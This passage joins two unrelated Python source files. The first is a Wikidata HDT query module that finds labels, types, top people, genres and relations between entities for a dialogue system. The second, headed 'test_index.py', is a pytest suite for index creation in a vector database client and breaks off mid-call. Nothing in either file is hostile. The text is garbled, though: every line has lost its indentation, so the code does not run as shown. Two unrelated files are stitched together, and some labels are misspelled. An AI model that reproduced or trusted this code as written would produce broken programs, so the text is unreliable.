"alias": "http://wal",
"description": "http://wd",
"rels": {"direct": "http://wpd", "no_type": "http://wp", "statement": "http://wps", "qualifier": "http://wpq"},
"statement": "http://ws",
}
max_comb_num = 1e6
lang = "@en"
wiki_filename = "/root/.deeppavlov/downloads/wikidata/wikidata_lite.hdt"
document = HDTDocument(wiki_filename)
USE_CACHE = True
ANIMALS_SKILL_TYPES = {"Q55983715", "Q16521", "Q43577", "Q39367", "Q38547"}
occ = {
"business": [["Q131524", "enterpreneur"]],
"sport": [
["Q937857", "football player"],
["Q2066131", "athlete"],
["Q3665646", "basketball player"],
["Q10833314", "tennis player"],
["Q19204627", "american football player"],
],
"films": [
["Q10800557", "film actor"],
["Q33999", "actor"],
["Q10798782", "television actor"],
["Q2526255", "film director"],
],
"music": [
["Q488205", "singer-songwriter"],
["Q36834", "composer"],
["Q177220", "singer"],
["Q753110", "songwriter"],
],
"literature": [["Q49757", "poet"], ["Q6625963", "novelist"], ["Q214917", "playwright"], ["Q36180", "writer"]],
"politics": [["Q82955", "politician"], ["Q372436", "statesperson"]],
}
top_n = 10
def find_top_people():
top_people = {}
for domain in occ:
occupations = occ[domain]
occ_people = []
for elem, elem_label in occupations:
tr, cnt = document.search_triples("", "http://wpd/P106", f"http://we/{elem}")
for triplet in tr:
occ_people.append(triplet[0])
people_with_cnt = []
for man in occ_people:
tr, cnt = document.search_triples(f"{man}", "", "")
people_with_cnt.append((man, cnt))
people_with_cnt = sorted(people_with_cnt, key=lambda x: x[1], reverse=True)
people_with_labels = []
for man, counts in people_with_cnt[:top_n]:
label = ""
tr, cnt = document.search_triples(f"{man}", "http://wl", "")
for triplet in tr:
if triplet[2].endswith("@en"):
label = triplet[2].replace("@en", "").replace('"', "")
break
if label:
people_with_labels.append([man, label])
top_people[domain] = people_with_labels
for domain in occ:
occupations = occ[domain]
for elem, elem_label in occupations:
occ_people = []
tr, cnt = document.search_triples("", "http://wpd/P106", f"http://we/{elem}")
for triplet in tr:
occ_people.append(triplet[0])
people_with_cnt = []
for man in occ_people:
tr, cnt = document.search_triples(f"{man}", "", "")
people_with_cnt.append((man, cnt))
people_with_cnt = sorted(people_with_cnt, key=lambda x: x[1], reverse=True)
people_with_labels = []
for man, counts in people_with_cnt[:top_n]:
label = ""
tr, cnt = document.search_triples(f"{man}", "http://wl", "")
for triplet in tr:
if triplet[2].endswith("@en"):
label = triplet[2].replace("@en", "").replace('"', "")
break
if label:
people_with_labels.append([man, label])
top_people[elem_label] = people_with_labels
return top_people
topic_skill_types = {
"Q36180", # writer
"Q49757", # poet
"Q214917", # playwright
"Q1930187", # journalist
"Q6625963", # novelist
"Q28389", # screenwriter
"Q571", # book
"Q277759", # book series
"Q8261", # novel
"Q47461344", # written work
"Q7725634", # literary work
"Q1667921", # novel series
"Q33999", # actor
"Q177220", # singer
"Q17125263", # youtuber
"Q245068", # comedian
"Q947873", # television presenter
"Q10800557", # film actor
"Q10798782", # television actor
"Q2405480", # voice actor
"Q211236", # celebrity
"Q82955", # politician
"Q372436", # statesperson
"Q488205", # singer-songwriter
"Q36834", # composer
"Q177220", # singer
"Q753110", # songwriter
"Q134556", # single
"Q7366", # song
"Q482994", # album
"Q2066131", # athlete
"Q937857", # football player
"Q4009406", # sprinter
"Q10843402", # swimmer
"Q10873124", # chess player
"Q3665646", # basketball player
"Q10833314", # tennis player
"Q19204627", # American football player
"Q10871364", # baseball player
"Q20639856", # team
"Q847017", # sports club
"Q476028", # football club
"Q4498974", # ice hockey team
"Q570116", # tourist attraction
"Q11424", # film
"Q24856", # film series
"Q82955", # politician
}
def search(self, query: List[str], unknown_elem_positions: List[Tuple[int, str]]) -> List[Dict[str, str]]:
query = list(map(lambda elem: "" if elem.startswith("?") else elem, query))
subj, rel, obj = query
combs = []
triplets, cnt = document.search_triples(subj, rel, obj)
if cnt < max_comb_num:
if rel == prefixes["description"]:
triplets = [triplet for triplet in triplets if triplet[2].endswith(lang)]
combs = [{elem: triplet[pos] for pos, elem in unknown_elem_positions} for triplet in triplets]
else:
log.debug("max comb num exceeds")
return combs
def format_date(entity, question):
date_info = re.findall(r"([\d]{3,4})-([\d]{1,2})-([\d]{1,2})", entity)
if date_info:
year, month, day = date_info[0]
if "how old" in question.lower():
entity = datetime.datetime.now().year - int(year)
elif day != "00":
date = datetime.datetime.strptime(f"{year}-{month}-{day}", "%Y-%m-%d")
entity = date.strftime("%d %B %Y")
else:
entity = year
return entity
entity = entity.lstrip("+-")
return entity
def find_label(entity: str, question: str) -> str:
entity = str(entity).replace('"', "")
if entity.startswith("Q") or entity.startswith("P"):
# example: "Q5513"
entity = f"{prefixes['entity']}/{entity}"
# "http://www.wikidata.org/entity/Q5513"
if entity.startswith(prefixes["entity"]):
labels, c = document.search_triples(entity, prefixes["label"], "")
# labels = [["http://www.wikidata.org/entity/Q5513", "http://www.w3.org/2000/01/rdf-schema#label",
# '"Lake Baikal"@en'], ...]
for label in labels:
if label[2].endswith(lang):
found_label = (
label[2].strip(lang).replace('"', "").replace(".", " ").replace("$", " ").replace(" ", " ")
)
return found_label
elif entity.endswith(lang):
# entity: '"Lake Baikal"@en'
entity = entity[:-3].replace(".", " ").replace("$", " ").replace(" ", " ")
return entity
elif "^^" in entity:
"""
examples:
'"1799-06-06T00:00:00Z"^^<http://www.w3.org/2001/XMLSchema#dateTime>' (date)
'"+1642"^^<http://www.w3.org/2001/XMLSchema#decimal>' (number)
"""
entity = entity.split("^^")[0]
for token in ["T00:00:00Z", "+"]:
entity = entity.replace(token, "")
entity = format_date(entity, question).replace(".", "").replace("$", "")
return entity
elif entity.isdigit():
entity = str(entity).replace(".", ",")
return entity
return "Not Found"
def find_alias(entity: str) -> List[str]:
aliases = []
if entity.startswith(prefixes["entity"]):
labels, cardinality = document.search_triples(entity, prefixes["alias"], "")
aliases = [label[2].strip(lang).strip('"') for label in labels if label[2].endswith(lang)]
return aliases
def find_rels(entity: str, direction: str, rel_type: str = "no_type", save: bool = False) -> List[str]:
rels = []
if not rel_type:
rel_type = "direct"
if direction == "forw":
query = [f"{prefixes['entity']}/{entity}", "", ""]
else:
query = ["", "", f"{prefixes['entity']}/{entity}"]
triplets, c = document.search_triples(*query)
start_str = f"{prefixes['rels'][rel_type]}/P"
rels = {triplet[1] for triplet in triplets if triplet[1].startswith(start_str)}
rels = list(rels)
return rels
def find_object(entity: str, rel: str, direction: str) -> List[str]:
objects = []
if not direction:
direction = "forw"
entity = f"{prefixes['entity']}/{entity.split('/')[-1]}"
rel = f"{prefixes['rels']['direct']}/{rel}"
if direction == "forw":
triplets, cnt = document.search_triples(entity, rel, "")
if cnt < max_comb_num:
objects.extend([triplet[2].split("/")[-1] for triplet in triplets])
else:
triplets, cnt = document.search_triples("", rel, entity)
if cnt < max_comb_num:
objects.extend([triplet[0].split("/")[-1] for triplet in triplets])
return objects
def check_triplet(subj: str, rel: str, obj: str) -> bool:
subj = f"{prefixes['entity']}/{subj}"
rel = f"{prefixes['rels']['direct']}/{rel}"
obj = f"{prefixes['entity']}/{obj}"
triplets, cnt = document.search_triples(subj, rel, obj)
if cnt > 0:
return True
else:
return False
def find_types(entity: str):
types = []
if not entity.startswith("http"):
entity = f"{prefixes['entity']}/{entity}"
tr, c = document.search_triples(entity, f"{prefixes['rels']['direct']}/P31", "")
types = [triplet[2].split("/")[-1] for triplet in tr]
if "Q5" in types:
tr, c = document.search_triples(entity, f"{prefixes['rels']['direct']}/P106", "")
types += [triplet[2].split("/")[-1] for triplet in tr]
types = list(set(types))
return types
def find_subclasses(entity: str):
if not entity.startswith("http"):
entity = f"{prefixes['entity']}/{entity}"
tr, c = document.search_triples(entity, f"{prefixes['rels']['direct']}/P279", "")
subclasses = [triplet[2].split("/")[-1] for triplet in tr]
subclasses = list(set(subclasses))
return subclasses
def find_types_2hop(entity: str):
types_1hop = find_types(entity)
types_2hop_list = []
for tp in types_1hop:
if tp != "Q5":
types_2hop = find_types(tp) + find_subclasses(tp)
types_2hop_list += types_2hop
types_list = types_2hop_list + types_1hop
types_list = list(set(types_list))
return types_list
def find_objects_info(objects, num_objects=25):
objects_info = []
for obj in objects[:num_objects]:
obj_label = find_label(obj, "")
if obj_label and obj_label not in {"Not Found", "anonymous"}:
objects_info.append((obj, obj_label))
return objects_info
def find_intersection(entity1, entity2, rel, direction):
if direction == "backw":
tr1, cnt1 = document.search_triples("", f"http://wpd/{rel}", f"http://we/{entity1}")
tr2, cnt2 = document.search_triples("", f"http://wpd/{rel}", f"http://we/{entity2}")
ind = 0
else:
tr1, cnt1 = document.search_triples(f"http://we/{entity1}", f"http://wpd/{rel}", "")
tr2, cnt2 = document.search_triples(f"http://we/{entity2}", f"http://wpd/{rel}", "")
ind = 2
elem1 = set([triplet[ind] for triplet in tr1])
elem2 = set([triplet[ind] for triplet in tr2])
elements = elem1.intersection(elem2)
info = []
if elements:
for elem in elements:
label = find_label(elem, "")
if label:
info.append(label)
break
return info
def find_connection(person1, person2):
rel_info = [
("P161", "films", "backw"),
("P175", "songs", "backw"),
("P50", "books", "backw"),
("P102", "party", "forw"),
("P54", "team", "forw"),
]
entities1 = [(entity_id, n) for n, entity_id in enumerate(person1)]
entities2 = [(entity_id, n) for n, entity_id in enumerate(person2)]
entity_pairs = list(itertools.product(entities1, entities2))
entity_pairs = sorted(entity_pairs, key=lambda x: sum([elem[1] for elem in x]))
entity_pairs = [[elem[0] for elem in entity_pair] for entity_pair in entity_pairs]
connection = ""
info = []
for entity1, entity2 in entity_pairs[:4]:
info = []
tr, cnt1 = document.search_triples(f"http://we/{entity1}", "http://wpd/P26", f"http://we/{entity2}")
tr, cnt2 = document.search_triples(f"http://we/{entity2}", "http://wpd/P26", f"http://we/{entity1}")
if cnt1 or cnt2:
connection = "spouse"
break
tr, cnt1 = document.search_triples(f"http://we/{entity1}", "http://wpd/P451", f"http://we/{entity2}")
tr, cnt2 = document.search_triples(f"http://we/{entity2}", "http://wpd/P451", f"http://we/{entity1}")
if cnt1 or cnt2:
connection = "partner"
break
for rel, conn, direction in rel_info:
info = find_intersection(entity1, entity2, rel, direction)
if info:
connection = conn
break
if info:
break
return connection, info
def extract_info():
art_genres = [
["film", "Q201658", "P136", ["Q11424"], "actor", "P161"],
["tv series", "Q15961987", "P136", ["Q5398426"], "tv actor", "P161"],
["song", "Q188451", "P136", ["Q134556", "Q7366"], "", ""],
["singer", "Q188451", "P136", ["Q488205", "Q36834", "Q177220", "Q753110"], "", ""],
["album", "Q188451", "P136", ["Q482994", "Q208569"], "", ""],
["book", "Q223393", "P136", ["Q7725634"], "writer", "P50"],
["athlete", "Q31629", "P641", ["Q5", "Q2066131"], "", ""],
["team", "Q31629", "P641", ["Q20639856", "Q12973014"], "", ""],
]
art_genres_dict = {}
people_genres_dict = {}
banned_types = {"Q82955", "Q372436"}
for art_type, genre_type, genre_rel, types, occupation, rel in art_genres:
genres_list = find_object(genre_type, "P31", "backw")
genre_labels_list = find_objects_info(genres_list, num_objects=200)
genre_dict = {}
people_dict = {}
for genre, genre_label in genre_labels_list:
art_objects = find_object(genre, genre_rel, "backw")
filtered_art_objects = []
for obj in art_objects:
obj_types = find_types_2hop(obj)
if set(types).intersection(obj_types) and not set(banned_types).intersection(obj_types):
filtered_art_objects.append(obj)
art_objects = filtered_art_objects
art_objects_with_scores = []
delete_words = [" film", " music"]
for word in delete_words:
if genre_label.endswith(word):
length = len(word)
genre_label = genre_label[:-length]
people_list = []
for obj in art_objects:
tr, cnt = document.search_triples(f"http://we/{obj}", "", "")
art_objects_with_scores.append((obj, cnt))
if occupation:
people = find_object(obj, rel, "forw")
people_list += people
if occupation:
people_with_scores = []
for man in people_list:
tr, cnt = document.search_triples(f"http://we/{man}", "", "")
people_with_scores.append((man, cnt))
people_with_scores = list(set(people_with_scores))
people_with_scores = sorted(people_with_scores, key=lambda x: x[1], reverse=True)
people_list = [man for man, score in people_with_scores]
people_labels = find_objects_info(people_list[:15])
if people_labels:
people_dict[genre_label] = people_labels
art_objects_with_scores = sorted(art_objects_with_scores, key=lambda x: x[1], reverse=True)
art_objects = [obj for obj, score in art_objects_with_scores]
art_objects_labels = find_objects_info(art_objects[:15])
if art_objects_labels:
genre_dict[genre_label] = art_objects_labels
art_genres_dict[art_type] = genre_dict
if occupation:
people_genres_dict[occupation] = people_dict
return art_genres_dict, people_genres_dict
def find_top_triplets(entity, entity_substr, pos=None, token_conf=None, conf=None):
triplets_info = {}
if entity.startswith("Q"):
triplets = {}
entity_label = find_label(entity, "")
triplets["plain_entity"] = entity
for rel_id, rel_label in [
("P31", "instance of"),
("P279", "subclass of"),
("P131", "located in"),
("P106", "occupation"),
("P361", "part of"),
("P17", "country"),
("P27", "country of sitizenship"),
("P569", "date of birth"),
("P1542", "has effect"),
("P580", "start time"),
("P1552", "has quality"),
("P50", "author"),
("P136", "genre"),
("P577", "publication date"),
("P800", "notable work"),
("P463", "musical group"),
("P1303", "instrument"),
("P166", "awards received"),
("P571", "inception"),
("P175", "performer"),
("P658", "tracklist"),
("P641", "sport"),
("P54", "member of sport team"),
("P1532", "country for sport"),
("P413", "position played on team"),
("P1344", "participant in"),
("P1449", "nickname"),
("P286", "head coach"),
("P118", "league"),
("P115", "home venue"),
("P2522", "victory"),
("P6364", "official color or colors"),
("P206", "located next to body of water"),
("P840", "narrative location"),
("P1830", "owner of"),
("P102", "member of political party"),
("P26", "spouse"),
("P451", "partner"),
]:
objects = find_object(entity, rel_id, "")
objects_info = find_objects_info(objects)
if rel_label == "occupation":
is_sportsman = any(
[{"Q2066131", "Q18536342"}.intersection(set(find_subclasses(occ))) for occ in objects]
)
if is_sportsman:
objects_info.append(["Q2066131", "athlete"])
if objects_info:
triplets[rel_label] = objects_info
songs = find_object(entity, "P175", "backw")
songs_with_labels = find_objects_info(songs)
if songs_with_labels:
triplets["songs of singer"] = songs_with_labels
players = find_object(entity, "P54", "backw")
players_with_labels = find_objects_info(players)
if players_with_labels:
triplets["players list"] = players_with_labels
entity_types = set(find_types(entity) + find_subclasses(entity))
if entity_types.intersection({"Q188451"}): # music genre
if entity_substr in genres_dict["singer"]:
triplets["top singers"] = genres_dict["singer"][entity_substr]
else:
for genre in genres_dict["singer"]:
if genre in entity_substr or entity_substr in genre:
triplets["top singers"] = genres_dict["singer"][genre]
if entity_substr in genres_dict["song"]:
triplets["top songs"] = genres_dict["song"][entity_substr]
else:
for genre in genres_dict["song"]:
if genre in entity_substr or entity_substr in genre:
triplets["top songs"] = genres_dict["song"][genre]
if entity_types.intersection({"Q31629", "Q4356073", "Q212434"}): # type of sport
if entity_substr in genres_dict["athlete"]:
triplets["top athletes"] = genres_dict["athlete"][entity_substr]
else:
for sport in genres_dict["athlete"]:
if sport in entity_substr or entity_substr in sport:
triplets["top athletes"] = genres_dict["athlete"][sport]
if entity_substr in genres_dict["team"]:
triplets["top teams"] = genres_dict["team"][entity_substr]
else:
for sport in genres_dict["team"]:
if sport in entity_substr or entity_substr in sport:
triplets["top teams"] = genres_dict["team"][sport]
triplets["entity_label"] = entity_label
occupations = triplets.get("occupation", [])
if occupations:
occupation_titles = set([occ_title for occ_id, occ_title in occupations])
if {"actor", "film actor", "television actor"}.intersection(occupation_titles):
objects = find_object(entity, "P161", "backw")
objects_info = find_objects_info(objects)
if objects_info:
triplets["films of actor"] = objects_info
if {"singer", "songwriter", "composer"}.intersection(occupation_titles):
objects = find_object(entity, "P175", "backw")
albums = [entity for entity in objects if "Q482994" in find_types(entity)]
songs = [entity for entity in objects if "Q134556" in find_types(entity)]
albums_info = find_objects_info(albums)
if albums_info:
triplets["albums"] = albums_info
songs_info = find_objects_info(songs)
if songs_info:
triplets["songs"] = songs_info
birth_date = find_object(entity, "P569", "")
if birth_date:
date_info = re.findall(r"([\d]{3,4})-([\d]{1,2})-([\d]{1,2})", birth_date[0])
if date_info:
year, month, day = date_info[0]
age = datetime.datetime.now().year - int(year)
triplets["age"] = age
types_2hop = find_types_2hop(entity)
types_2hop_with_labels = find_objects_info(types_2hop)
triplets["types_2hop"] = types_2hop_with_labels
if pos is not None:
triplets["pos"] = pos
if token_conf is not None:
triplets["token_conf"] = token_conf
if conf is not None:
triplets["conf"] = conf
triplets_info[entity_substr] = triplets
return triplets_info
def filter_by_types(objects, types):
filtered_objects = []
for obj in objects:
found_types = find_types(obj)
if set(found_types).intersection(types):
filtered_objects.append(obj)
return filtered_objects
def find_objects_by_category(what_to_find, category, subject):
objects = []
if category == "movie" and what_to_find == "actors":
objects = find_object(subject, "P161", "forw")
elif category == "show" and what_to_find == "actors":
objects = find_object(subject, "P161", "forw")
elif category == "show" and what_to_find == "episodes":
objects = find_object(subject, "P179", "backw")
elif category == "singer" and what_to_find == "songs":
objects = find_object(subject, "P175", "backw")
objects = filter_by_types(objects, {"Q134556", "Q7366"})
elif category == "singer" and what_to_find == "albums":
objects = find_object(subject, "P175", "backw")
objects = filter_by_types(objects, {"Q482994", "Q208569"})
elif category == "music" and what_to_find == "songs":
objects = find_object(subject, "P175", "backw")
objects = filter_by_types(objects, {"Q134556", "Q7366"})
elif category == "music" and what_to_find == "albums":
objects = find_object(subject, "P175", "backw")
objects = filter_by_types(objects, {"Q482994", "Q208569"})
elif category == "music" and what_to_find == "singers":
objects = find_object(subject, "P175", "backw")
objects = filter_by_types(objects, {"Q488205", "Q36834", "Q177220", "Q753110"})
else:
pass
objects_with_labels = find_objects_info(objects[:20])
return objects_with_labels
if USE_CACHE:
with open("/root/.deeppavlov/downloads/wikidata/wikidata_cache.json", "r") as fl:
wikidata_cache = json.load(fl)
top_people = wikidata_cache["top_people"]
genres_dict = wikidata_cache["genres_dict"]
people_genres_dict = wikidata_cache["people_genres_dict"]
else:
top_people = find_top_people()
genres_dict, people_genres_dict = extract_info()
manager = mp.Manager()
def execute_queries_list(parser_info_list: List[str], queries_list: List[Any], utt_num: int, wiki_parser_output):
for parser_info, query in zip(parser_info_list, queries_list):
if parser_info == "find_rels":
rels = []
try:
rels = find_rels(*query)
except Exception as e:
log.info("Wrong arguments are passed to wiki_parser")
sentry_sdk.capture_exception(e)
log.exception(e)
wiki_parser_output += rels
elif parser_info == "find_top_triplets":
triplets_info = {}
topic_skills_triplets_info = {}
wiki_skill_triplets_info = {}
animals_skill_triplets_info = {}
try:
for entity_info in query:
if entity_info:
entity_substr = entity_info.get("entity_substr", "")
entity_ids = entity_info.get("entity_ids", [])
tokens_match_conf_list = entity_info.get("tokens_match_conf", [1.0])
confidences = entity_info.get("confidences", [1.0])
if entity_ids:
entity_triplets_info = find_top_triplets(
entity_ids[0], entity_substr, 0, tokens_match_conf_list[0], confidences[0]
)
triplets_info = {**triplets_info, **entity_triplets_info}
found_topic_skills_info = False
found_wiki_skill_info = False
for n, (entity, token_conf, conf) in enumerate(
zip(entity_ids, tokens_match_conf_list, confidences)
):
types = find_types(entity)
types_2hop = find_types_2hop(entity)
if not found_topic_skills_info and (
set(types).intersection(topic_skill_types)
or set(types_2hop).intersection(topic_skill_types)
):
entity_triplets_info = find_top_triplets(entity, entity_substr, n, token_conf, conf)
topic_skills_triplets_info = {**topic_skills_triplets_info, **entity_triplets_info}
if not set(types_2hop).intersection({"Q11424", "Q24856"}):
found_topic_skills_info = True
if not found_wiki_skill_info and (
set(types).intersection(wiki_skill_used_types)
or set(types_2hop).intersection(wiki_skill_used_types)
):
entity_triplets_info = find_top_triplets(entity, entity_substr, n, token_conf, conf)
wiki_skill_triplets_info = {**wiki_skill_triplets_info, **entity_triplets_info}
if not set(types_2hop).intersection({"Q11424", "Q24856"}):
found_wiki_skill_info = True
if found_topic_skills_info and found_wiki_skill_info:
break
for n, (entity, token_conf, conf) in enumerate(
zip(entity_ids, tokens_match_conf_list, confidences)
):
types = find_types(entity)
types_2hop = find_types_2hop(entity)
if set(types).intersection(ANIMALS_SKILL_TYPES) or set(types_2hop).intersection(
ANIMALS_SKILL_TYPES
):
entity_triplets_info = find_top_triplets(entity, entity_substr, n, token_conf, conf)
animals_skill_triplets_info = {**animals_skill_triplets_info, **entity_triplets_info}
except Exception as e:
log.info("Wrong arguments are passed to wiki_parser")
sentry_sdk.capture_exception(e)
log.exception(e)
wiki_parser_output.append(
{
"entities_info": triplets_info,
"topic_skill_entities_info": topic_skills_triplets_info,
"wiki_skill_entities_info": wiki_skill_triplets_info,
"animals_skill_entities_info": animals_skill_triplets_info,
"utt_num": utt_num,
}
)
elif parser_info == "find_top_people":
top_people_list = []
try:
for occ in query:
if occ in top_people:
top_people_list.append(top_people[occ])
except Exception as e:
log.info("Wrong arguments are passed to wiki_parser")
sentry_sdk.capture_exception(e)
log.exception(e)
wiki_parser_output.append(top_people_list)
elif parser_info == "find_connection":
conn_info = []
try:
entities1, entities2 = query
conn_info = list(find_connection(entities1, entities2))
except Exception as e:
log.info("Wrong arguments are passed to wiki_parser")
sentry_sdk.capture_exception(e)
log.exception(e)
wiki_parser_output.append(conn_info)
elif parser_info == "find_topic_info":
objects = []
try:
if "genre" in query and "category" in query:
genre = query["genre"]
category = query["category"]
if category in {"actor", "singer", "tv actor", "writer"}:
if category in people_genres_dict and genre in people_genres_dict[category]:
objects = people_genres_dict[category][genre]
else:
if category in genres_dict and genre in genres_dict[category]:
objects = genres_dict[category][genre]
elif "what_to_find" in query and "category" in query and "subject" in query:
what_to_find = query["what_to_find"]
category = query["category"]
subject = query["subject"]
objects = find_objects_by_category(what_to_find, category, subject)
else:
log.debug("unsupported query type")
except Exception as e:
log.info("Wrong arguments are passed to wiki_parser")
sentry_sdk.capture_exception(e)
log.exception(e)
wiki_parser_output.append(objects)
elif parser_info == "find_object":
objects = []
try:
objects = find_object(*query)
except Exception as e:
log.info("Wrong arguments are passed to wiki_parser")
sentry_sdk.capture_exception(e)
log.exception(e)
wiki_parser_output.append(objects)
elif parser_info == "check_triplet":
check_res = False
try:
check_res = check_triplet(*query)
except Exception as e:
log.info("Wrong arguments are passed to wiki_parser")
sentry_sdk.capture_exception(e)
log.exception(e)
wiki_parser_output.append(check_res)
elif parser_info == "find_label":
label = ""
try:
label = find_label(*query)
except Exception as e:
log.info("Wrong arguments are passed to wiki_parser")
sentry_sdk.capture_exception(e)
log.exception(e)
wiki_parser_output.append(label)
elif parser_info == "find_types":
types = []
try:
types = find_types(query)
except Exception as e:
log.info("Wrong arguments are passed to wiki_parser")
sentry_sdk.capture_exception(e)
log.exception(e)
wiki_parser_output.append(types)
elif parser_info == "find_triplets":
triplets = []
try:
triplets_forw, c = document.search_triples(f"{prefixes['entity']}/{query}", "", "")
triplets.extend(
[triplet for triplet in triplets_forw if not triplet[2].startswith(prefixes["statement"])]
)
triplets_backw, c = document.search_triples("", "", f"{prefixes['entity']}/{query}")
triplets.extend(
[triplet for triplet in triplets_backw if not triplet[0].startswith(prefixes["statement"])]
)
except Exception as e:
log.info("Wrong arguments are passed to wiki_parser")
sentry_sdk.capture_exception(e)
log.exception(e)
wiki_parser_output.append(list(triplets))
else:
raise ValueError(f"Unsupported query type {parser_info}")
def wp_call(parser_info_list: List[str], queries_list: List[Any], utt_num: int) -> List[Any]:
wiki_parser_output = manager.list()
p = mp.Process(target=execute_queries_list, args=(parser_info_list, queries_list, utt_num, wiki_parser_output))
p.start()
p.join()
return list(wiki_parser_output)
|
test_index.py
|
import pytest
from base.client_base import TestcaseBase
from base.index_wrapper import ApiIndexWrapper
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from common.code_mapping import CollectionErrorMessage as clem
from common.code_mapping import IndexErrorMessage as iem
from utils.utils import *
from common.constants import *
prefix = "index"
default_schema = cf.gen_default_collection_schema()
default_field_name = ct.default_float_vec_field_name
default_index_params = {"index_type": "IVF_SQ8", "metric_type": "L2", "params": {"nlist": 64}}
# copied from pymilvus
uid = "test_index"
BUILD_TIMEOUT = 300
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
# query = gen_search_vectors_params(field_name, default_entities, default_top_k, 1)
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
class TestIndexParams(TestcaseBase):
""" Test case of index interface """
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("collection", [None, "coll"])
def test_index_non_collection(self, collection):
"""
target: test index with None collection
method: input none collection object
expected: raise exception
"""
self._connect()
self.index_wrap.init_index(collection, default_field_name, default_index_params, check_task=CheckTasks.err_res,
check_items={ct.err_code: 0, ct.err_msg: clem.CollectionType})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("field_name", ct.get_invalid_strs)
def test_index_field_name_invalid(self, field_name):
"""
target: test index with error field name
method: input field name
expected: raise exception
"""
collection_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=collection_name)
log.error(iem.WrongFieldName % str(field_name))
self.index_wrap.init_index(collection_w.collection, field_name, default_index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: iem.WrongFieldName % str(field_name)})
@pytest.mark.tags(CaseLabel.L1)
def test_index_field_name_not_existed(self):
"""
target: test index with error field name
method: input field name not created
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
f_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
self.index_wrap.init_index(collection_w.collection, f_name, default_index_params, check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: f"cannot create index on non-existed field: {f_name}"})
@pytest.mark.tags(CaseLabel.L0)
# TODO (reason="pymilvus issue #677", raises=TypeError)
@pytest.mark.parametrize("index_type", ct.get_invalid_strs)
def test_index_type_invalid(self, index_type):
"""
target: test index with error index type
method: input invalid index type
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index_params = copy.deepcopy(default_index_params)
index_params["index_type"] = index_type
if not isinstance(index_params["index_type"], str):
msg = "must be str"
else:
msg = "Invalid index_type"
self.index_wrap.init_index(collection_w.collection, default_field_name, index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: msg})
@pytest.mark.tags(CaseLabel.L1)
def test_index_type_not_supported(self):
"""
target: test index with error index type
method: input unsupported index type
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index_params = copy.deepcopy(default_index_params)
index_params["index_type"] = "IVFFFFFFF"
self.index_wrap.init_index(collection_w.collection, default_field_name, index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
@pytest.mark.tags(CaseLabel.L1)
def test_index_params_invalid(self, get_invalid_index_params):
"""
target: test index with error index params
method: input invalid index params
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index_params = get_invalid_index_params
self.index_wrap.init_index(collection_w.collection, default_field_name, index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
# TODO: not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_name_invalid(self, get_invalid_index_name):
"""
target: test index with error index name
method: input invalid index name
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
index_name = get_invalid_index_name
collection_w = self.init_collection_wrap(name=c_name)
self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
class TestIndexOperation(TestcaseBase):
""" Test case of index interface """
@pytest.mark.tags(CaseLabel.L1)
def test_index_create_with_different_indexes(self):
"""
target: test create index on one field, with two different type of index
method: create two different indexes
expected: only latest index can be created for a collection
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
self.index_wrap.init_index(collection_w.collection, default_field_name, default_index)
assert len(collection_w.indexes) == 1
assert collection_w.indexes[0].params["index_type"] == default_index["index_type"]
@pytest.mark.tags(CaseLabel.L1)
def test_index_collection_empty(self):
"""
target: test index with empty collection
method: Index on empty collection
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
# TODO: assert index
cf.assert_equal_index(index, collection_w.collection.indexes[0])
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("index_param", [default_index_params])
def test_index_params(self, index_param):
"""
target: test index with all index type/params
method: input valid params
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
index_params = index_param
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, index_params)
# TODO: assert index
cf.assert_equal_index(index, collection_w.collection.indexes[0])
@pytest.mark.tags(CaseLabel.L1)
def test_index_params_flush(self):
"""
target: test index with all index type/params
method: input valid params
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
self._connect().flush([collection_w.name])
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
# TODO: assert index
cf.assert_equal_index(index, collection_w.collection.indexes[0])
assert collection_w.num_entities == ct.default_nb
# TODO: not support
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_name_dup(self):
"""
target: test index with duplicate index name
method: create index with existed index name create by `collection.create_index`
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
index_name = ct.default_index_name
collection_w = self.init_collection_wrap(name=c_name)
collection_w.collection.create_index(default_field_name, default_index_params, index_name=index_name)
self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params,
check_task=CheckTasks.err_res,
